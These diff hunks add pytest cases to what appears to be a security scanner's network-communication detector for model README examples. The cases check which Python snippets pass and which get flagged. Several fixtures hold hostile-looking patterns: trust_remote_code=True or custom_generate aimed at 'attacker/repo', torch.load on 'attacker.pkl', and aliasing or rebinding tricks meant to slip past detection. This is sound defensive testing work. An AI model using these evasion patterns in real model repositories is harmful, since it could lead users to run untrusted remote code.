+            "runner()\n(runner := evil)\n",
+            "if False:\n    (runner := evil)\nrunner()\n",
+            "(runner := evil)\nrunner = model.generate\nrunner()\n",
+            "runner()\nfor runner in [evil]:\n    print(runner)\n",
+            "runner()\ndef runner():\n    requests.get(image_url, stream=True)\n",
+        ],
+        ids=[
+            "post-call-walrus",
+            "unreachable-walrus",
+            "overwritten-walrus",
+            "post-call-loop-target",
+            "post-call-function-rebind",
+        ],
+    )
+    def test_readme_python_example_allows_irrelevant_unmodeled_callable_write(
+        self,
+        call_setup: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "def evil():\n"
+            "    for _ in range(1):\n"
+            "        requests.get(image_url, stream=True)\n"
+            "runner = model.generate\n"
+            f"{call_setup}```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        ("alias_setup", "mapping_setup", "remote_call", "remote_key"),
+        [
+            (
+                "runner = model.generate\n",
+                "options = {'input_ids': 1}\n",
+                "runner(**options)\n",
+                "custom_generate",
+            ),
+            (
+                "loader = AutoModel.from_pretrained\n",
+                "options = {'revision': 'main'}\n",
+                "loader('official/model', **options)\n",
+                "trust_remote_code",
+            ),
+        ],
+        ids=["generate", "from-pretrained"],
+    )
+    def test_readme_python_example_allows_named_remote_call_before_mapping_mutation(
+        self,
+        alias_setup: str,
+        mapping_setup: str,
+        remote_call: str,
+        remote_key: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{alias_setup}{mapping_setup}{remote_call}"
+            f"options['{remote_key}'] = 'attacker/repo'\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        ("alias_setup", "mapping_setup", "remote_call", "remote_key"),
+        [
+            (
+                "runner = model.generate\n",
+                "options = {'input_ids': 1}\n",
+                "runner(**options)\n",
+                "custom_generate",
+            ),
+            (
+                "loader = AutoModel.from_pretrained\n",
+                "options = {'revision': 'main'}\n",
+                "loader('official/model', **options)\n",
+                "trust_remote_code",
+            ),
+        ],
+        ids=["generate", "from-pretrained"],
+    )
+    def test_readme_python_example_rejects_named_remote_call_after_mapping_mutation(
+        self,
+        alias_setup: str,
+        mapping_setup: str,
+        remote_call: str,
+        remote_key: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{alias_setup}{mapping_setup}"
+            f"options['{remote_key}'] = 'attacker/repo'\n"
+            f"{remote_call}"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
         "generate_arguments",
         [
             "None, None, None, None, None, None, None, None, None, None, 'attacker/repo'",
@@ -4404,6 +4713,96 @@ class TestNetworkCommDetector:
         findings = NetworkCommDetector().scan(data, "README.md")
 
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "shared_mapping_setup",
+        [
+            "alias = options = {'input_ids': 1}\nalias |= {'custom_generate': 'attacker/repo'}\n",
+            ("first_alias = alias = options = {'input_ids': 1}\nfirst_alias |= {'custom_generate': 'attacker/repo'}\n"),
+        ],
+        ids=["two-targets", "three-targets"],
+    )
+    def test_readme_python_example_rejects_chained_literal_mapping_alias_mutation(
+        self,
+        shared_mapping_setup: str,
+    ) -> None:
+        """Every target of a chained literal assignment shares the same mapping."""
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{shared_mapping_setup}"
+            "model.generate(**options)\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    def test_readme_python_example_allows_detached_chained_literal_mapping_alias_mutation(self) -> None:
+        data = (
+            b"```python\nimport requests\nfrom transformers import AutoModel\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"model = AutoModel.from_pretrained('official/model')\n"
+            b"alias = options = {'input_ids': 1}\n"
+            b"alias = {}\n"
+            b"alias |= {'custom_generate': 'attacker/repo'}\n"
+            b"model.generate(**options)\n"
+            b"requests.get(image_url, stream=True)\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    def test_readme_python_example_allows_alias_mutation_after_proven_conditional_rebind(self) -> None:
+        data = (
+            b"```python\nimport requests\nfrom transformers import AutoModel\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"model = AutoModel.from_pretrained('official/model')\n"
+            b"options = {'input_ids': 1}\n"
+            b"alias = options\n"
+            b"if True:\n"
+            b"    alias = {}\n"
+            b"alias |= {'custom_generate': 'attacker/repo'}\n"
+            b"model.generate(**options)\n"
+            b"requests.get(image_url, stream=True)\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "conditional_rebind",
+        [
+            "if False:\n    alias = {}\n",
+            "if image.mode:\n    alias = {}\n",
+        ],
+        ids=["constant-false", "runtime-condition"],
+    )
+    def test_readme_python_example_rejects_alias_mutation_after_conditional_rebind(
+        self,
+        conditional_rebind: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "options = {'input_ids': 1}\n"
+            "alias = options\n"
+            f"{conditional_rebind}"
+            "alias |= {'custom_generate': 'attacker/repo'}\n"
+            "model.generate(**options)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
 
     @pytest.mark.parametrize(
         ("alias_operations", "mapping_name"),

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -3351,6 +3351,107 @@ class TestNetworkCommDetector:
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
 
     @pytest.mark.parametrize(
+        "model_setup",
+        [
+            "model = AutoModelForImageClassification.from_pretrained('official/model').to('cuda')\n",
+            ("model = AutoModelForImageClassification.from_pretrained('official/model')\nmodel = model.to('cuda')\n"),
+        ],
+        ids=["chained-transfer", "ordered-rebind-transfer"],
+    )
+    def test_readme_python_example_allows_proven_transformers_model_device_transfer(
+        self,
+        model_setup: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\n"
+            "from transformers import AutoModelForImageClassification\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "inputs = {'pixel_values': 1}\n"
+            f"{model_setup}"
+            "outputs = model(**inputs)\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "model_setup",
+        [
+            (
+                "device = 'attacker'\n"
+                "model = AutoModelForImageClassification.from_pretrained('official/model').to(device)\n"
+            ),
+            "model = AutoModelForImageClassification.from_pretrained('official/model').to('cuda', 'cpu')\n",
+            (
+                "model = AutoModelForImageClassification.from_pretrained('official/model').to("
+                "device='cuda', non_blocking=True)\n"
+            ),
+            (
+                "model = AutoModelForImageClassification.from_pretrained('official/model')\n"
+                "model = evil\n"
+                "model = model.to('cuda')\n"
+            ),
+            (
+                "model = AutoModelForImageClassification.from_pretrained('official/model')\n"
+                "transfer = model.to\n"
+                "model = transfer('cuda')\n"
+            ),
+            (
+                "model = AutoModelForImageClassification.from_pretrained('official/model')\n"
+                "model.to = evil\n"
+                "model = model.to('cuda')\n"
+            ),
+            (
+                "model = AutoModelForImageClassification.from_pretrained("
+                "'attacker/repo', trust_remote_code=True).to('cuda')\n"
+            ),
+            (
+                "model = AutoModelForImageClassification.from_pretrained("
+                "'attacker/repo', custom_generate='attacker/repo').to('cuda')\n"
+            ),
+            (
+                "model = AutoModelForImageClassification.from_pretrained('official/model')\n"
+                "alias = model\n"
+                "model = alias.to('cuda')\n"
+            ),
+        ],
+        ids=[
+            "dynamic-device",
+            "extra-positional-transfer-argument",
+            "extra-keyword-transfer-argument",
+            "rebound-receiver",
+            "aliased-method",
+            "mutated-method",
+            "remote-code-factory",
+            "custom-generate-factory",
+            "aliased-receiver",
+        ],
+    )
+    def test_readme_python_example_rejects_unproven_transformers_model_device_transfer(
+        self,
+        model_setup: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\n"
+            "from transformers import AutoModelForImageClassification\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "inputs = {'pixel_values': 1}\n"
+            "def evil(*args, **kwargs):\n"
+            "    requests.get(image_url, stream=True)\n"
+            f"{model_setup}"
+            "outputs = model(**inputs)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
         "model_flow",
         [
             (
@@ -3958,6 +4059,57 @@ class TestNetworkCommDetector:
         assert proof_calls <= max_proof_calls
         assert any(finding["type"] == "network_library" for finding in findings)
         assert any(finding["type"] == "network_function" for finding in findings)
+
+    def test_readme_python_example_bounds_scan_wide_named_callable_proof_work(
+        self,
+        monkeypatch: pytest.MonkeyPatch,
+    ) -> None:
+        """Repeated call sites share a bounded named-callable proof budget."""
+        repeated_bindings = "\n".join("runner = print" for _ in range(4))
+        repeated_calls = "\n".join("runner()" for _ in range(4))
+        example = (
+            "import requests\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            f"{repeated_bindings}\n"
+            f"{repeated_calls}\n"
+            "requests.get(image_url, stream=True)\n"
+        )
+        fence = f"```python\n{example}```\n"
+        node_count = sum(1 for _ in network_comm.ast.walk(network_comm.ast.parse(example)))
+        proof_work = node_count * 4
+        proof_budget = network_comm._ReadmeImageExampleProofBudget()
+        proof_budget.named_callable_remaining = proof_work
+
+        assert not network_comm._is_valid_official_readme_sample_image_example(
+            example.encode(),
+            proof_budget=proof_budget,
+        )
+        assert (proof_budget.named_callable_remaining, proof_budget.exceeded) == (0, False)
+        assert not network_comm._is_valid_official_readme_sample_image_example(
+            example.encode(),
+            proof_budget=proof_budget,
+        )
+        assert (proof_budget.named_callable_remaining, proof_budget.exceeded) == (0, True)
+
+        monkeypatch.setattr(
+            network_comm,
+            "_MAX_README_IMAGE_EXAMPLE_NAMED_CALLABLE_PROOF_WORK",
+            proof_work,
+            raising=False,
+        )
+        detector = NetworkCommDetector()
+
+        exhausted_findings = detector.scan((fence * 2).encode(), "README.md")
+        fresh_findings = detector.scan(
+            b"```python\nimport requests\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"requests.get(image_url, stream=True)\n```\n",
+            "README.md",
+        )
+
+        assert any(finding["type"] == "network_library" for finding in exhausted_findings)
+        assert any(finding["type"] == "network_function" for finding in exhausted_findings)
+        assert not [finding for finding in fresh_findings if finding["type"] in {"network_library", "network_function"}]
 
     def test_readme_python_example_distinguishes_exact_mapping_proof_budget_from_overrun(self) -> None:
         """An optional proof may consume the exact budget but must not hide an overrun."""
@@ -5276,6 +5428,128 @@ class TestNetworkCommDetector:
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
 
     @pytest.mark.parametrize(
+        "model_setup",
+        [
+            "model = AutoModel.from_pretrained('official/model').to('cuda')\n",
+            "model = AutoModel.from_pretrained('official/model')\nmodel = model.to('cuda')\n",
+        ],
+        ids=["chained-transfer", "ordered-rebind-transfer"],
+    )
+    def test_readme_python_example_allows_processor_output_on_transferred_model_device(
+        self,
+        tmp_path: Path,
+        model_setup: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            f"{model_setup}"
+            "inputs = processor(images=image, return_tensors='pt').to(model.device)\n"
+            "model.generate(**inputs)\n```\n"
+        ).encode()
+        readme_path = tmp_path / "README.md"
+        readme_path.write_bytes(data)
+
+        findings = NetworkCommDetector().scan(data, readme_path.name)
+        aggregate = scan_model_directory_or_file(str(readme_path), cache_enabled=False)
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+        assert determine_exit_code(aggregate) == 0
+
+    @pytest.mark.parametrize(
+        "model_flow",
+        [
+            (
+                "device = image.mode\n"
+                "model = AutoModel.from_pretrained('official/model').to(device)\n"
+                "inputs = processor(images=image, return_tensors='pt').to(model.device)\n"
+            ),
+            (
+                "trusted_model = AutoModel.from_pretrained('official/model')\n"
+                "model = trusted_model.to('cuda')\n"
+                "inputs = processor(images=image, return_tensors='pt').to(model.device)\n"
+            ),
+            (
+                "model = AutoModel.from_pretrained('official/model')\n"
+                "model = image\n"
+                "model = model.to('cuda')\n"
+                "inputs = processor(images=image, return_tensors='pt').to(model.device)\n"
+            ),
+            (
+                "model = AutoModel.from_pretrained('official/model')\n"
+                "transfer = model.to\n"
+                "model = transfer('cuda')\n"
+                "inputs = processor(images=image, return_tensors='pt').to(model.device)\n"
+            ),
+            (
+                "model = AutoModel.from_pretrained('official/model')\n"
+                "model.to = print\n"
+                "model = model.to('cuda')\n"
+                "inputs = processor(images=image, return_tensors='pt').to(model.device)\n"
+            ),
+            (
+                "model = AutoModel.from_pretrained('official/model').to('cuda', 'cpu')\n"
+                "inputs = processor(images=image, return_tensors='pt').to(model.device)\n"
+            ),
+            ("model = image\ninputs = processor(images=image, return_tensors='pt').to(model.device)\n"),
+            (
+                "inputs = processor(images=image, return_tensors='pt').to(model.device)\n"
+                "model = AutoModel.from_pretrained('official/model').to('cuda')\n"
+            ),
+            (
+                "if image.mode:\n"
+                "    model = AutoModel.from_pretrained('official/model').to('cuda')\n"
+                "inputs = processor(images=image, return_tensors='pt').to(model.device)\n"
+            ),
+            (
+                "def prepare():\n"
+                "    model = AutoModel.from_pretrained('official/model').to('cuda')\n"
+                "inputs = processor(images=image, return_tensors='pt').to(model.device)\n"
+            ),
+        ],
+        ids=[
+            "dynamic-transfer-device",
+            "aliased-receiver",
+            "rebound-receiver",
+            "aliased-method",
+            "mutated-method",
+            "extra-transfer-argument",
+            "untrusted-provider",
+            "provider-after-use",
+            "branch-only-provider",
+            "deferred-provider",
+        ],
+    )
+    def test_readme_python_example_rejects_unproven_transferred_model_device_provider(
+        self,
+        model_flow: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            f"{model_flow}"
+            "model.generate(**inputs)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(
+            finding["type"] == "network_library" and finding["severity"] in {"HIGH", "CRITICAL"} for finding in findings
+        )
+        assert any(
+            finding["type"] == "network_function" and finding["severity"] in {"HIGH", "CRITICAL"}
+            for finding in findings
+        )
+
+    @pytest.mark.parametrize(
         ("provider_setup", "device_expression"),
         [
             ("provider = image\n", "provider.device"),
@@ -5488,6 +5762,123 @@ class TestNetworkCommDetector:
         findings = NetworkCommDetector().scan(data, "README.md")
 
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "model_flow",
+        [
+            (
+                "allow_remote_code = False\n"
+                "AutoModel.from_pretrained('official/model', trust_remote_code=allow_remote_code)\n"
+            ),
+            (
+                "allow_remote_code = False\n"
+                "AutoModel.from_pretrained("
+                "'official/model', **{'trust_remote_code': allow_remote_code})\n"
+            ),
+            (
+                "allow_remote_code = False\n"
+                "remote_options = {'trust_remote_code': allow_remote_code}\n"
+                "AutoModel.from_pretrained('official/model', **remote_options)\n"
+            ),
+            (
+                "custom_generate = None\n"
+                "model = AutoModel.from_pretrained('official/model')\n"
+                "model.generate(custom_generate=custom_generate)\n"
+            ),
+            (
+                "allow_remote_code = False\n"
+                "AutoModel.from_pretrained('official/model', trust_remote_code=allow_remote_code)\n"
+                "allow_remote_code = True\n"
+            ),
+        ],
+        ids=[
+            "named-false-keyword",
+            "named-false-inline-mapping",
+            "named-false-bound-mapping",
+            "named-none-custom-generate",
+            "post-call-rebind",
+        ],
+    )
+    def test_readme_python_example_allows_ordered_disabled_remote_code_binding(
+        self,
+        model_flow: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            f"{model_flow}"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "model_flow",
+        [
+            (
+                "allow_remote_code = False\n"
+                "allow_remote_code = True\n"
+                "AutoModel.from_pretrained('attacker/repo', trust_remote_code=allow_remote_code)\n"
+            ),
+            (
+                "if image_url:\n"
+                "    allow_remote_code = False\n"
+                "AutoModel.from_pretrained('attacker/repo', trust_remote_code=allow_remote_code)\n"
+            ),
+            (
+                "False and (allow_remote_code := False)\n"
+                "AutoModel.from_pretrained('attacker/repo', trust_remote_code=allow_remote_code)\n"
+            ),
+            (
+                "def configure():\n"
+                "    allow_remote_code = False\n"
+                "AutoModel.from_pretrained('attacker/repo', trust_remote_code=allow_remote_code)\n"
+            ),
+            (
+                "allow_remote_code = True\n"
+                "AutoModel.from_pretrained('attacker/repo', trust_remote_code=allow_remote_code)\n"
+            ),
+            (
+                "allow_remote_code = bool(image_url)\n"
+                "AutoModel.from_pretrained('attacker/repo', trust_remote_code=allow_remote_code)\n"
+            ),
+            (
+                "allow_remote_code = False\n"
+                "remote_options = {'trust_remote_code': allow_remote_code}\n"
+                "alias = remote_options\n"
+                "alias['trust_remote_code'] = True\n"
+                "AutoModel.from_pretrained('attacker/repo', **remote_options)\n"
+            ),
+        ],
+        ids=[
+            "rebound",
+            "branch-only",
+            "short-circuited-walrus",
+            "deferred-binding",
+            "true-binding",
+            "dynamic-binding",
+            "mutated-mapping-alias",
+        ],
+    )
+    def test_readme_python_example_rejects_unproven_disabled_remote_code_binding(
+        self,
+        model_flow: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            f"{model_flow}"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
 
     @pytest.mark.parametrize(
         "later_operation",

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -3178,6 +3178,251 @@ class TestNetworkCommDetector:
 
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
 
+    def test_readme_python_example_allows_processor_generate_kwargs_unpacking(self) -> None:
+        """A canonical Transformers processor output is a trusted model-input mapping."""
+        data = (
+            b"```python\nimport requests\nfrom PIL import Image\n"
+            b"from transformers import AutoModel, AutoProcessor\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            b"processor = AutoProcessor.from_pretrained('official/model')\n"
+            b"model = AutoModel.from_pretrained('official/model')\n"
+            b"inputs = processor(images=image, return_tensors='pt')\n"
+            b"model.generate(**inputs)\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        ("factory_name", "instance_name", "inputs_expression"),
+        [
+            ("AutoTokenizer", "tokenizer", "tokenizer('hello', return_tensors='pt')"),
+            ("BertTokenizerFast", "tokenizer", "tokenizer('hello', return_tensors='pt')"),
+            (
+                "AutoFeatureExtractor",
+                "feature_extractor",
+                "feature_extractor(images=image, return_tensors='pt')",
+            ),
+            (
+                "AutoProcessor",
+                "processor",
+                "processor(images=image, return_tensors='pt').to('cpu')",
+            ),
+        ],
+        ids=["auto-tokenizer", "fast-tokenizer", "feature-extractor", "processor-to-cpu"],
+    )
+    def test_readme_python_example_allows_trusted_transformers_mapping_factories(
+        self,
+        factory_name: str,
+        instance_name: str,
+        inputs_expression: str,
+    ) -> None:
+        """Canonical Transformers input factories produce trusted model-input mappings."""
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            f"from transformers import AutoModel, {factory_name}\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            f"{instance_name} = {factory_name}.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"inputs = {inputs_expression}\n"
+            "model.generate(**inputs)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "inputs_setup",
+        [
+            ("device = 'cpu'; inputs = processor(images=image, return_tensors='pt').to(device)\n"),
+            ("inputs = processor(images=image, return_tensors='pt'); inputs = inputs.to('cpu')\n"),
+        ],
+        ids=["named-device", "mapping-rebind"],
+    )
+    def test_readme_python_example_allows_ordered_mapping_device_transfers(self, inputs_setup: str) -> None:
+        """A unique device literal and provenance-preserving rebinding remain canonical."""
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{inputs_setup}"
+            "model.generate(**inputs)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    def test_readme_python_example_allows_tokenizer_output_on_trusted_model_device(self) -> None:
+        """A uniquely bound Transformers model provides a canonical tensor device."""
+        data = (
+            b"```python\nimport requests\n"
+            b"from transformers import AutoModelForCausalLM, AutoTokenizer\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"tokenizer = AutoTokenizer.from_pretrained('official/model')\n"
+            b"model = AutoModelForCausalLM.from_pretrained('official/model')\n"
+            b"inputs = tokenizer('hello', return_tensors='pt').to(model.device)\n"
+            b"model.generate(**inputs)\n"
+            b"requests.get(image_url, stream=True)\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        ("provider_setup", "device_expression"),
+        [
+            ("provider = image\n", "provider.device"),
+            ("model = image; ", "model.device"),
+        ],
+        ids=["arbitrary-provider", "same-line-model-rebind"],
+    )
+    def test_readme_python_example_rejects_untrusted_model_device_provider(
+        self,
+        provider_setup: str,
+        device_expression: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            "from transformers import AutoModelForCausalLM, AutoTokenizer\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "tokenizer = AutoTokenizer.from_pretrained('official/model')\n"
+            "model = AutoModelForCausalLM.from_pretrained('official/model')\n"
+            f"{provider_setup}"
+            f"inputs = tokenizer('hello', return_tensors='pt').to({device_expression})\n"
+            "model.generate(**inputs)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    def test_readme_python_example_rejects_same_line_mapping_factory_rebind(self) -> None:
+        """A same-line callee rebind must invalidate trusted mapping-factory provenance."""
+        data = (
+            b"```python\nimport requests\nimport torch\nfrom PIL import Image\n"
+            b"from transformers import AutoModel, AutoProcessor\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            b"processor = AutoProcessor.from_pretrained('official/model')\n"
+            b"model = AutoModel.from_pretrained('official/model')\n"
+            b"processor = torch.load; inputs = processor('attacker.pkl')\n"
+            b"model.generate(**inputs)\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        ("processor_binding", "inputs_binding"),
+        [
+            (
+                "processor = AutoModel.from_pretrained('official/model')\n",
+                "inputs = processor(images=image, return_tensors='pt')\n",
+            ),
+            (
+                "processor = AutoProcessor.from_pretrained('official/model')\n",
+                "processor_options = {\n"
+                "    'images': image,\n"
+                "    'return_tensors': 'pt',\n"
+                "    'custom_generate': 'attacker/repo',\n"
+                "}\n"
+                "inputs = processor(**processor_options)\n",
+            ),
+            (
+                "processor = AutoProcessor.from_pretrained('official/model')\n",
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "alias = inputs\n"
+                "alias |= {'custom_generate': 'attacker/repo'}\n",
+            ),
+            (
+                "processor = AutoProcessor.from_pretrained('official/model')\n",
+                "inputs = processor(*[image], return_tensors='pt')\n",
+            ),
+            (
+                "processor = AutoProcessor.from_pretrained('official/model')\n",
+                "inputs = processor(images=image, return_tensors='pt', trust_remote_code=True)\n",
+            ),
+            (
+                "processor = AutoProcessor.from_pretrained('official/model')\n",
+                "inputs = processor(images=image, return_tensors='pt').to('cpu').tolist()\n",
+            ),
+            (
+                "processor = AutoProcessor.from_pretrained('official/model')\n",
+                "device = image.mode\ninputs = processor(images=image, return_tensors='pt').to(device)\n",
+            ),
+            (
+                "processor = AutoProcessor.from_pretrained('official/model')\n",
+                "device = 'cpu'; device = 'cuda'; inputs = processor(images=image, return_tensors='pt').to(device)\n",
+            ),
+            (
+                "processor = AutoProcessor.from_pretrained('official/model')\n",
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "inputs = {'custom_generate': 'attacker/repo'}\n"
+                "inputs = inputs.to('cpu')\n",
+            ),
+            (
+                "processor = AutoProcessor.from_pretrained('official/model')\n",
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "def inputs():\n"
+                "    return {'custom_generate': 'attacker/repo'}\n"
+                "inputs = inputs.to('cpu')\n",
+            ),
+        ],
+        ids=[
+            "non-processor-factory",
+            "dynamic-processor-options",
+            "mutated-processor-output",
+            "starred-processor-arguments",
+            "remote-code-processor-option",
+            "arbitrary-method-chain",
+            "dynamic-device-transfer",
+            "rebound-device-transfer",
+            "malicious-mapping-rebind",
+            "function-mapping-rebind",
+        ],
+    )
+    def test_readme_python_example_rejects_unproven_processor_generate_kwargs(
+        self,
+        processor_binding: str,
+        inputs_binding: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            f"{processor_binding}"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{inputs_binding}"
+            "model.generate(**inputs)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
     @pytest.mark.parametrize(
